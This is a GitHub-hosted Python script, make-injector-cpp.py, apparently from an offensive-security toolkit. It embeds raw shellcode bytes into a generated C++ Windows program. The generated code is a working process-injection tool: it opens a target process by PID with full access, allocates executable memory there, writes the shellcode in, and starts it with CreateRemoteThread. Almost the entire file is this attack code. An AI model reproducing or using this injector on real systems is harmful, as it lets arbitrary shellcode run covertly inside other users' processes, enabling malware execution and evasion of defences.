-
Notifications
You must be signed in to change notification settings - Fork 88
/
Copy pathmake-injector-cpp.py
executable file
·84 lines (63 loc) · 2.41 KB
/
make-injector-cpp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
import os
current_dir = os.getcwd()
raw_bytes = os.path.join(current_dir, "raw-bytes.bin")
if os.path.isfile(raw_bytes):
with open(raw_bytes, 'rb') as iFile:
data = iFile.read()
injector = """// This file is auto-generated by make-injector-cpp.py.
#include <windows.h>
#include <stdio.h>
#define BASE_10 10
unsigned char hexData[%d] = { %s };
int inject_dll(DWORD pid) {
HANDLE proc;
LPVOID addr_mem, addr_loadlibrary;
HANDLE ret;
BOOL success;
printf("Attempting to inject shellcode.\\n");
// Open the target process with all permissions.
proc = OpenProcess(PROCESS_ALL_ACCESS, 0, pid);
if (!proc) { printf("OpenProcess failed, error: %%d\\n", GetLastError()); return -1; }
else printf("OpenProcess OK, handle: %%p.\\n", proc);
// Allocate memory in process space for shellcode.
addr_mem = (LPVOID)VirtualAllocEx(proc, 0, sizeof(hexData)+1, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!addr_mem) { printf("VirtualAllocEx failed: %%d\\n", GetLastError()); return -1; }
else printf("VirtualAllocEx OK, address = 0x%%p.\\n", addr_mem);
// Write in the shellcode.
success = WriteProcessMemory(proc, (LPVOID)addr_mem, hexData, sizeof(hexData), 0);
if (!success) { printf("WriteProcessMemory failed: %%d\\n", GetLastError()); return -1; }
else printf("WriteProcessMemory OK.\\n");
// Create thread in target pointed at shellcode.
ret = CreateRemoteThread(proc, 0, 0, (LPTHREAD_START_ROUTINE)addr_mem, 0, 0, 0);
if (!ret) { printf("CreateRemoteThread failed: %%d\\n", GetLastError()); return -1; }
else printf("CreateRemoteThread OK.\\n");
success = CloseHandle(proc);
if (!success) { printf("CloseHandle failed.\\n"); return -1; }
return 0;
}
int main(int argc, char **argv) {
const char syntax_str[] = "Syntax: injector.exe <target-pid>\\n";
if (argc < 2) {
printf(syntax_str);
return -1;
}
// Convert argument to PID (long int).
DWORD pid = strtol(argv[1], 0, BASE_10);
if (pid == 0) {
printf(syntax_str);
return -1;
}
// Inject.
int ret = inject_dll(pid);
if (ret != 0) {
printf("Injection failed.\\n");
return -1;
}
printf("Done.\\n");
return 0;
}
""" % (len(data), ', '.join([hex(ord(b)) for b in data]))
with open("injector.cpp", 'wb') as oFile:
oFile.write(injector)
else:
print "[!] Unable to find raw-bytes.bin. Run make-raw-bytes.py first."